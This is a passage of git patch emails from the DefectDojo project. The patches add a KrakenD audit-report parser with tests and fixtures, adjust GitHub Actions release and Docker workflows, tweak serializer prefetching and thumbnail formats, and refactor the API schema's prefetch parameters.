0, "low": 0, "info": 0, "total": 0}, - {"epoch": 1606780800000, "grouped_date": date(2020, 
12, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, + "active_per_period": [ + {"epoch": 1509494400000, "grouped_date": date(2017, 11, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, + {"epoch": 1512086400000, "grouped_date": date(2017, 12, 1), "critical": 0, "high": 0, "medium": 0, "low": 2, "info": 0, "total": 2}, + {"epoch": 1514764800000, "grouped_date": date(2018, 1, 1), "critical": 0, "high": 1, "medium": 0, "low": 0, "info": 0, "total": 1}, ], - [ - {"epoch": 1604188800000, "grouped_date": date(2020, 11, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, - {"epoch": 1606780800000, "grouped_date": date(2020, 12, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, + "accepted_per_period": [ + {"epoch": 1509494400000, "grouped_date": date(2017, 11, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, + {"epoch": 1512086400000, "grouped_date": date(2017, 12, 1), "critical": 0, "high": 1, "medium": 0, "low": 0, "info": 0, "total": 1}, + {"epoch": 1514764800000, "grouped_date": date(2018, 1, 1), "critical": 0, "high": 2, "medium": 0, "low": 0, "info": 0, "total": 2}, ], - ], + }, ) self.assertEqual( finding_queries["weekly_counts"], { "opened_per_period": [ - {"epoch": 1606694400000, "grouped_date": date(2020, 11, 30), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "closed": 0}, - {"epoch": 1607299200000, "grouped_date": date(2020, 12, 7), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "closed": 0}, - {"epoch": 1607904000000, "grouped_date": date(2020, 12, 14), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "closed": 0}, - ], - "accepted_per_period": [ - {"epoch": 1606694400000, "grouped_date": date(2020, 11, 30), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}, - {"epoch": 1607299200000, "grouped_date": date(2020, 12, 7), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}, - {"epoch": 1607904000000, "grouped_date": date(2020, 12, 14), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}, + {"epoch": 1513555200000, "grouped_date": date(2017, 12, 18), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0, "closed": 0}, + {"epoch": 1514160000000, "grouped_date": date(2017, 12, 25), "critical": 0, "high": 2, "medium": 0, "low": 3, "info": 0, "total": 5, "closed": 2}, + {"epoch": 1514764800000, "grouped_date": date(2018, 1, 1), "critical": 0, "high": 6, "medium": 0, "low": 6, "info": 0, "total": 12, "closed": 0}, ], "active_per_period": [ - {"epoch": 1606694400000, "grouped_date": date(2020, 11, 30), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}, - {"epoch": 1607299200000, "grouped_date": date(2020, 12, 7), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}, - {"epoch": 1607904000000, "grouped_date": date(2020, 12, 14), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}, + {"epoch": 1513555200000, "grouped_date": date(2017, 12, 18), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, + {"epoch": 1514160000000, "grouped_date": date(2017, 12, 25), "critical": 0, "high": 0, "medium": 0, "low": 2, "info": 0, "total": 2}, + {"epoch": 1514764800000, "grouped_date": date(2018, 1, 1), "critical": 0, "high": 1, "medium": 0, "low": 0, "info": 0, "total": 1}, + ], + "accepted_per_period": [ + {"epoch": 1513555200000, "grouped_date": 
date(2017, 12, 18), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, + {"epoch": 1514160000000, "grouped_date": date(2017, 12, 25), "critical": 0, "high": 1, "medium": 0, "low": 0, "info": 0, "total": 1}, + {"epoch": 1514764800000, "grouped_date": date(2018, 1, 1), "critical": 0, "high": 2, "medium": 0, "low": 0, "info": 0, "total": 2}, ], }, ) @@ -224,14 +247,17 @@ def test_endpoint_queries(self): [ {"epoch": 1590969600000, "grouped_date": date(2020, 6, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0, "closed": 0}, {"epoch": 1593561600000, "grouped_date": date(2020, 7, 1), "critical": 0, "high": 1, "medium": 0, "low": 0, "info": 5, "total": 6, "closed": 0}, + {"epoch": 1596240000000, "grouped_date": date(2020, 8, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0, "closed": 0}, ], [ {"epoch": 1590969600000, "grouped_date": date(2020, 6, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, {"epoch": 1593561600000, "grouped_date": date(2020, 7, 1), "critical": 0, "high": 1, "medium": 0, "low": 0, "info": 4, "total": 5}, + {"epoch": 1596240000000, "grouped_date": date(2020, 8, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, ], [ {"epoch": 1590969600000, "grouped_date": date(2020, 6, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, {"epoch": 1593561600000, "grouped_date": date(2020, 7, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 1, "total": 1}, + {"epoch": 1596240000000, "grouped_date": date(2020, 8, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, ], ], ) From c0b12fecfe5173ee7dfcf233775901a74d3cb740 Mon Sep 17 00:00:00 2001 From: manuelsommer <47991713+manuel-sommer@users.noreply.github.com> Date: Fri, 20 Sep 2024 23:11:00 +0200 Subject: [PATCH 42/62] :sparkles: implement krakend audit parser (#10924) * :sparkles: implement krakend audit parser * advance unittests --- .../parsers/file/krakend_audit.md | 11 ++++++ dojo/settings/.settings.dist.py.sha256sum | 2 +- dojo/settings/settings.dist.py | 2 ++ dojo/tools/krakend_audit/__init__.py | 1 + dojo/tools/krakend_audit/parser.py | 34 +++++++++++++++++++ .../scans/krakend_audit/many_findings.json | 30 ++++++++++++++++ .../scans/krakend_audit/no_findings.json | 4 +++ unittests/tools/test_krakend_audit_parser.py | 22 ++++++++++++ 8 files changed, 105 insertions(+), 1 deletion(-) create mode 100644 docs/content/en/integrations/parsers/file/krakend_audit.md create mode 100644 dojo/tools/krakend_audit/__init__.py create mode 100644 dojo/tools/krakend_audit/parser.py create mode 100644 unittests/scans/krakend_audit/many_findings.json create mode 100644 unittests/scans/krakend_audit/no_findings.json create mode 100644 unittests/tools/test_krakend_audit_parser.py diff --git a/docs/content/en/integrations/parsers/file/krakend_audit.md b/docs/content/en/integrations/parsers/file/krakend_audit.md new file mode 100644 index 00000000000..9598ce343b8 --- /dev/null +++ b/docs/content/en/integrations/parsers/file/krakend_audit.md @@ -0,0 +1,11 @@ +--- +title: "KrakenD Audit Scan" +toc_hide: true +--- +Import KrakenD Audit Scan results in JSON format. You can use the following command to audit the KrakenD configuration which then can be uploaded to DefectDojo: +``` +krakend audit -c krakend.json -f "{{ marshal . 
}}" >> recommendations.json +``` + +### Sample Scan Data +Sample KrakenD Audit scans can be found [here](https://github.com/DefectDojo/django-DefectDojo/tree/master/unittests/scans/krakend_audit). \ No newline at end of file diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum index 38c8e498527..5dfa946a6c2 100644 --- a/dojo/settings/.settings.dist.py.sha256sum +++ b/dojo/settings/.settings.dist.py.sha256sum @@ -1 +1 @@ -702d74c8bc703d11c03cf5b3f7c4319ad0cdeaef68db6426d1112c59e59365a6 +b330f7dbd92c2df5a2a0632befc9775bef4a1c62b90375aa511957ebcd0ea82a diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py index bd33f7fed8a..d96733ca8ff 100644 --- a/dojo/settings/settings.dist.py +++ b/dojo/settings/settings.dist.py @@ -1280,6 +1280,7 @@ def saml2_attrib_map_format(dict): "Legitify Scan": ["title", "endpoints", "severity"], "ThreatComposer Scan": ["title", "description"], "Invicti Scan": ["title", "description", "severity"], + "KrakenD Audit Scan": ["description", "mitigation", "severity"], } # Override the hardcoded settings here via the env var @@ -1505,6 +1506,7 @@ def saml2_attrib_map_format(dict): "Legitify Scan": DEDUPE_ALGO_HASH_CODE, "ThreatComposer Scan": DEDUPE_ALGO_UNIQUE_ID_FROM_TOOL_OR_HASH_CODE, "Invicti Scan": DEDUPE_ALGO_HASH_CODE, + "KrakenD Audit Scan": DEDUPE_ALGO_HASH_CODE, } # Override the hardcoded settings here via the env var diff --git a/dojo/tools/krakend_audit/__init__.py b/dojo/tools/krakend_audit/__init__.py new file mode 100644 index 00000000000..3ad798a42b3 --- /dev/null +++ b/dojo/tools/krakend_audit/__init__.py @@ -0,0 +1 @@ +__author__ = "manuel-sommer" diff --git a/dojo/tools/krakend_audit/parser.py b/dojo/tools/krakend_audit/parser.py new file mode 100644 index 00000000000..062c978e3c5 --- /dev/null +++ b/dojo/tools/krakend_audit/parser.py @@ -0,0 +1,34 @@ +import json + +from dojo.models import Finding + + +class KrakenDAuditParser: + def get_scan_types(self): + return ["KrakenD Audit Scan"] + + def get_label_for_scan_types(self, scan_type): + return scan_type # no custom label for now + + def get_description_for_scan_types(self, scan_type): + return "Import JSON reports of KrakenD Audit Scans." + + def get_findings(self, file, test): + data = json.load(file) + findings = [] + for recommendation in data.get("recommendations", []): + rule = recommendation.get("rule", None) + severity = recommendation.get("severity") + message = recommendation.get("message", None) + if rule is not None: + finding = Finding( + title="KrakenD" + "_" + rule, + test=test, + description="**Rule:** " + rule, + severity=severity.lower().capitalize(), + mitigation=message, + static_finding=True, + dynamic_finding=False, + ) + findings.append(finding) + return findings diff --git a/unittests/scans/krakend_audit/many_findings.json b/unittests/scans/krakend_audit/many_findings.json new file mode 100644 index 00000000000..726ae2d029c --- /dev/null +++ b/unittests/scans/krakend_audit/many_findings.json @@ -0,0 +1,30 @@ +{ + "recommendations": [ + { + "rule": "2.1.2", + "severity": "HIGH", + "message": "Enable TLS or use a terminator in front of KrakenD." + }, + { + "rule": "2.1.7", + "severity": "HIGH", + "message": "Enable HTTP security header checks (security/http)." + }, + { + "rule": "2.2.1", + "severity": "MEDIUM", + "message": "Hide the version banner in runtime." + }, + { + "rule": "3.1.1", + "severity": "LOW", + "message": "Enable a bot detector." 
+ }, + { + "rule": "4.2.1", + "severity": "MEDIUM", + "message": "Implement a telemetry system for tracing for monitoring and troubleshooting." + } + ], + "stats": {} + } \ No newline at end of file diff --git a/unittests/scans/krakend_audit/no_findings.json b/unittests/scans/krakend_audit/no_findings.json new file mode 100644 index 00000000000..cfbc08ae70a --- /dev/null +++ b/unittests/scans/krakend_audit/no_findings.json @@ -0,0 +1,4 @@ +{ + "recommendations": [], + "stats": {} + } \ No newline at end of file diff --git a/unittests/tools/test_krakend_audit_parser.py b/unittests/tools/test_krakend_audit_parser.py new file mode 100644 index 00000000000..60f44d51ec1 --- /dev/null +++ b/unittests/tools/test_krakend_audit_parser.py @@ -0,0 +1,22 @@ +from dojo.models import Test +from dojo.tools.krakend_audit.parser import KrakenDAuditParser +from unittests.dojo_test_case import DojoTestCase + + +class TestKrakenDAuditParser(DojoTestCase): + + def test_parse_no_findings(self): + with open("unittests/scans/krakend_audit/no_findings.json", encoding="utf-8") as testfile: + parser = KrakenDAuditParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(0, len(findings)) + + def test_parse_many_findings(self): + with open("unittests/scans/krakend_audit/many_findings.json", encoding="utf-8") as testfile: + parser = KrakenDAuditParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(5, len(findings)) + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("High", finding.severity) + self.assertEqual("Enable TLS or use a terminator in front of KrakenD.", finding.mitigation) From 1755effd674bdc83878162ccd7ee9909b50299b1 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:13:02 -0500 Subject: [PATCH 43/62] GHA Release: Update settings SHA when creating PR from master (#10927) --- .github/workflows/release-3-master-into-dev.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/.github/workflows/release-3-master-into-dev.yml b/.github/workflows/release-3-master-into-dev.yml index b5c8828ee16..cbd287d232e 100644 --- a/.github/workflows/release-3-master-into-dev.yml +++ b/.github/workflows/release-3-master-into-dev.yml @@ -50,11 +50,15 @@ jobs: CURRENT_CHART_VERSION=$(grep -oP 'version: (\K\S*)?' helm/defectdojo/Chart.yaml | head -1) sed -ri "0,/version/s/version: \S+/$(echo "version: $CURRENT_CHART_VERSION" | awk -F. -v OFS=. 'NF==1{print ++$NF}; NF>1{$NF=sprintf("%0*d", length($NF), ($NF+1)); print}')-dev/" helm/defectdojo/Chart.yaml + - name: Update settings SHA + run: sha256sum dojo/settings/settings.dist.py | cut -d ' ' -f1 > dojo/settings/.settings.dist.py.sha256sum + - name: Check numbers run: | grep version dojo/__init__.py grep appVersion helm/defectdojo/Chart.yaml grep version components/package.json + cat dojo/settings/.settings.dist.py.sha256sum - name: Create upgrade notes to documentation run: | @@ -132,11 +136,15 @@ jobs: CURRENT_CHART_VERSION=$(grep -oP 'version: (\K\S*)?' helm/defectdojo/Chart.yaml | head -1) sed -ri "0,/version/s/version: \S+/$(echo "version: $CURRENT_CHART_VERSION" | awk -F. -v OFS=. 
'NF==1{print ++$NF}; NF>1{$NF=sprintf("%0*d", length($NF), ($NF+1)); print}')-dev/" helm/defectdojo/Chart.yaml + - name: Update settings SHA + run: sha256sum dojo/settings/settings.dist.py | cut -d ' ' -f1 > dojo/settings/.settings.dist.py.sha256sum + - name: Check numbers run: | grep version dojo/__init__.py grep appVersion helm/defectdojo/Chart.yaml grep version components/package.json + cat dojo/settings/.settings.dist.py.sha256sum - name: Push version changes uses: stefanzweifel/git-auto-commit-action@v5.0.1 From b62884364cfeb44684214b3e7c1e908cc6134ff4 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:14:01 -0500 Subject: [PATCH 44/62] GHA: Remove Docker Caches (#10928) --- .../build-docker-images-for-testing.yml | 4 +--- .../release-x-manual-docker-containers.yml | 20 ------------------- 2 files changed, 1 insertion(+), 23 deletions(-) diff --git a/.github/workflows/build-docker-images-for-testing.yml b/.github/workflows/build-docker-images-for-testing.yml index a8a570a9f8c..c5753973ae2 100644 --- a/.github/workflows/build-docker-images-for-testing.yml +++ b/.github/workflows/build-docker-images-for-testing.yml @@ -45,9 +45,7 @@ jobs: tags: defectdojo/defectdojo-${{ matrix.docker-image }}:${{ matrix.os }} file: Dockerfile.${{ matrix.docker-image }}-${{ matrix.os }} outputs: type=docker,dest=${{ matrix.docker-image }}-${{ matrix.os }}_img - cache-from: type=gha,scope=${{ matrix.docker-image }} - cache-to: type=gha,mode=max,scope=${{ matrix.docker-image }} - + # export docker images to be used in next jobs below - name: Upload image ${{ matrix.docker-image }} as artifact timeout-minutes: 10 diff --git a/.github/workflows/release-x-manual-docker-containers.yml b/.github/workflows/release-x-manual-docker-containers.yml index bae585d2388..6f8862b6216 100644 --- a/.github/workflows/release-x-manual-docker-containers.yml +++ b/.github/workflows/release-x-manual-docker-containers.yml @@ -49,18 +49,6 @@ jobs: id: buildx uses: docker/setup-buildx-action@v3 - - name: Cache Docker layers - uses: actions/cache@v4 - env: - docker-image: ${{ matrix.docker-image }} - with: - path: /tmp/.buildx-cache-${{ env.docker-image }} - key: ${{ runner.os }}-buildx-${{ env.docker-image }}-${{ matrix.os }}-${{ env.workflow_name }}-${{ github.sha }}-${{ github.run_id }} - restore-keys: | - ${{ runner.os }}-buildx-${{ env.docker-image }}-${{ matrix.os }}-${{ env.workflow_name}}-${{ github.sha }} - ${{ runner.os }}-buildx-${{ env.docker-image }}-${{ matrix.os }}-${{ env.workflow_name }} - ${{ runner.os }}-buildx-${{ env.docker-image }}-${{ matrix.os }}- - - name: Build and push images with debian if: ${{ matrix.os == 'debian' }} uses: docker/build-push-action@v6 @@ -73,8 +61,6 @@ jobs: tags: ${{ env.REPO_ORG }}/defectdojo-${{ env.docker-image}}:${{ github.event.inputs.release_number }}-${{ matrix.os }}, ${{ env.REPO_ORG }}/defectdojo-${{ env.docker-image}}:${{ github.event.inputs.release_number }}, ${{ env.REPO_ORG }}/defectdojo-${{ env.docker-image}}:latest file: ./Dockerfile.${{ env.docker-image }}-${{ matrix.os }} context: . 
- cache-from: type=local,src=/tmp/.buildx-cache-${{ env.docker-image }} - cache-to: type=local,dest=/tmp/.buildx-cache-${{ env.docker-image }} - name: Build and push images with alpine if: ${{ matrix.os == 'alpine' }} @@ -88,9 +74,3 @@ jobs: tags: ${{ env.REPO_ORG }}/defectdojo-${{ env.docker-image}}:${{ github.event.inputs.release_number }}-${{ matrix.os }} file: ./Dockerfile.${{ env.docker-image }}-${{ matrix.os }} context: . - cache-from: type=local,src=/tmp/.buildx-cache-${{ env.docker-image }} - cache-to: type=local,dest=/tmp/.buildx-cache-${{ env.docker-image }} -# platforms: ${{ matrix.platform }} - - - name: Image digest - run: echo ${{ steps.docker_build.outputs.digest }} From aadf96b8162bfcf58556edc464354d1c0febb853 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:15:17 -0500 Subject: [PATCH 45/62] Prefetch Serialization: Add a preference during mapping (#10933) --- dojo/api_v2/prefetch/prefetcher.py | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/dojo/api_v2/prefetch/prefetcher.py b/dojo/api_v2/prefetch/prefetcher.py index 79a4b0e7314..3596b3f9409 100644 --- a/dojo/api_v2/prefetch/prefetcher.py +++ b/dojo/api_v2/prefetch/prefetcher.py @@ -3,11 +3,17 @@ from rest_framework.serializers import ModelSerializer +from dojo.models import FileUpload + from . import utils # Reduce the scope of search for serializers. SERIALIZER_DEFS_MODULE = "dojo.api_v2.serializers" +preferred_serializers = { + FileUpload: "FileSerializer", +} + class _Prefetcher: @staticmethod @@ -31,7 +37,11 @@ def _is_model_serializer(obj): for _, serializer in available_serializers: model = serializer.Meta.model - serializers[model] = serializer + if model in preferred_serializers: + if serializer.__name__ == preferred_serializers[model]: + serializers[model] = serializer + else: + serializers[model] = serializer # We add object->None to have a more uniform processing later on serializers[object] = None From 4d9bf9a5841d2594067110b5a17620b2efd8c70c Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:15:54 -0500 Subject: [PATCH 46/62] Manage Images: Do not display thumbnail for PDF (#10932) --- dojo/templatetags/display_tags.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/dojo/templatetags/display_tags.py b/dojo/templatetags/display_tags.py index 19a63541d38..6dcbcb2873d 100644 --- a/dojo/templatetags/display_tags.py +++ b/dojo/templatetags/display_tags.py @@ -69,10 +69,10 @@ "mark_finding_duplicate": "Mark as duplicate", } -supported_file_formats = [ +supported_thumbnail_file_formats = [ "apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", - "png", "svg", "webp", "pdf", + "png", "svg", "webp", ] @@ -860,7 +860,7 @@ def jira_change(obj): def get_thumbnail(file): from pathlib import Path file_format = Path(file.file.url).suffix[1:] - return file_format in supported_file_formats + return file_format in supported_thumbnail_file_formats @register.filter From 072a18557bfd2897270a6cdbb1ae5bd87308d836 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:16:37 -0500 Subject: [PATCH 47/62] Prefetching: Add swagger docs for models already supporting prefetching (#10931) * Prefetching: Add swagger docs for models already supporting prefetching * Fix Flake8 * Correct unit tests --- dojo/api_v2/views.py | 369 +++++++------------------------------------ 1 file changed, 57 
insertions(+), 312 deletions(-) diff --git a/dojo/api_v2/views.py b/dojo/api_v2/views.py index 05d16521069..b36924640b8 100644 --- a/dojo/api_v2/views.py +++ b/dojo/api_v2/views.py @@ -172,6 +172,33 @@ logger = logging.getLogger(__name__) +def schema_with_prefetch() -> dict: + return { + "list": extend_schema( + parameters=[ + OpenApiParameter( + "prefetch", + OpenApiTypes.STR, + OpenApiParameter.QUERY, + required=False, + description="List of fields for which to prefetch model instances and add those to the response", + ), + ], + ), + "retrieve": extend_schema( + parameters=[ + OpenApiParameter( + "prefetch", + OpenApiTypes.STR, + OpenApiParameter.QUERY, + required=False, + description="List of fields for which to prefetch model instances and add those to the response", + ), + ], + ), + } + + class DojoOpenApiJsonRenderer(OpenApiJsonRenderer2): def get_indent(self, accepted_media_type, renderer_context): if accepted_media_type and "indent" in accepted_media_type: @@ -211,30 +238,7 @@ def get_queryset(self): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class DojoGroupViewSet( PrefetchDojoModelViewSet, ): @@ -252,30 +256,7 @@ def get_queryset(self): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class DojoGroupMemberViewSet( PrefetchDojoModelViewSet, ): @@ -301,6 +282,7 @@ def partial_update(self, request, pk=None): # Authorization: superuser +@extend_schema_view(**schema_with_prefetch()) class GlobalRoleViewSet( PrefetchDojoModelViewSet, ): @@ -315,6 +297,7 @@ def get_queryset(self): # Authorization: object-based +# @extend_schema_view(**schema_with_prefetch()) class EndPointViewSet( PrefetchDojoModelViewSet, ): @@ -370,6 +353,7 @@ def generate_report(self, request, pk=None): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class EndpointStatusViewSet( PrefetchDojoModelViewSet, ): @@ -398,6 +382,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class EngagementViewSet( PrefetchDojoModelViewSet, ra_api.AcceptedRisksMixin, @@ -651,6 +636,7 @@ def download_file(self, request, file_id, pk=None): return generate_file_response(file_object) +@extend_schema_view(**schema_with_prefetch()) class RiskAcceptanceViewSet( PrefetchDojoModelViewSet, ): @@ -716,6 +702,7 @@ def download_proof(self, request, pk=None): # These are technologies in the UI and the API! 
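# ---------------------------------------------------------------------------
# Illustrative aside, not part of the surrounding patch hunks: a minimal
# sketch of how an API client consumes the "prefetch" query parameter that
# schema_with_prefetch() documents. The base URL and token below are
# assumptions for the example, not values taken from this repository.
#
#     import requests
#
#     BASE_URL = "https://defectdojo.example.com/api/v2"  # assumed host
#     HEADERS = {"Authorization": "Token <api-token>"}     # assumed credential
#
#     # Ask the products endpoint to inline related Product_Type objects
#     # instead of returning bare foreign-key ids.
#     resp = requests.get(
#         f"{BASE_URL}/products/",
#         params={"prefetch": "prod_type"},
#         headers=HEADERS,
#         timeout=30,
#     )
#     body = resp.json()
#     # Related instances arrive under body["prefetch"]["prod_type"], keyed
#     # by primary key, alongside the usual paginated "results" list.
# ---------------------------------------------------------------------------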
# Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class AppAnalysisViewSet( PrefetchDojoModelViewSet, ): @@ -734,6 +721,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class CredentialsViewSet( PrefetchDojoModelViewSet, ): @@ -747,6 +735,7 @@ def get_queryset(self): # Authorization: configuration +@extend_schema_view(**schema_with_prefetch()) class CredentialsMappingViewSet( PrefetchDojoModelViewSet, ): @@ -1486,6 +1475,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class JiraIssuesViewSet( PrefetchDojoModelViewSet, ): @@ -1511,6 +1501,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class JiraProjectViewSet( PrefetchDojoModelViewSet, ): @@ -1573,6 +1564,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class ProductAPIScanConfigurationViewSet( PrefetchDojoModelViewSet, ): @@ -1599,30 +1591,7 @@ def get_queryset(self): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class DojoMetaViewSet( PrefetchDojoModelViewSet, ): @@ -1646,30 +1615,7 @@ def get_queryset(self): return get_authorized_dojo_meta(Permissions.Product_View) -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class ProductViewSet( prefetch.PrefetchListMixin, prefetch.PrefetchRetrieveMixin, @@ -1745,30 +1691,7 @@ def generate_report(self, request, pk=None): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class ProductMemberViewSet( PrefetchDojoModelViewSet, ): @@ -1796,30 +1719,7 @@ def partial_update(self, request, pk=None): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model 
instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class ProductGroupViewSet( PrefetchDojoModelViewSet, ): @@ -1847,30 +1747,7 @@ def partial_update(self, request, pk=None): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class ProductTypeViewSet( PrefetchDojoModelViewSet, ): @@ -1955,30 +1832,7 @@ def generate_report(self, request, pk=None): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class ProductTypeMemberViewSet( PrefetchDojoModelViewSet, ): @@ -2020,30 +1874,7 @@ def partial_update(self, request, pk=None): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class ProductTypeGroupViewSet( PrefetchDojoModelViewSet, ): @@ -2071,6 +1902,7 @@ def partial_update(self, request, pk=None): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class StubFindingsViewSet( PrefetchDojoModelViewSet, ): @@ -2109,6 +1941,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class TestsViewSet( PrefetchDojoModelViewSet, ra_api.AcceptedRisksMixin, @@ -2316,30 +2149,7 @@ def get_queryset(self): return Test_Type.objects.all().order_by("id") -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - 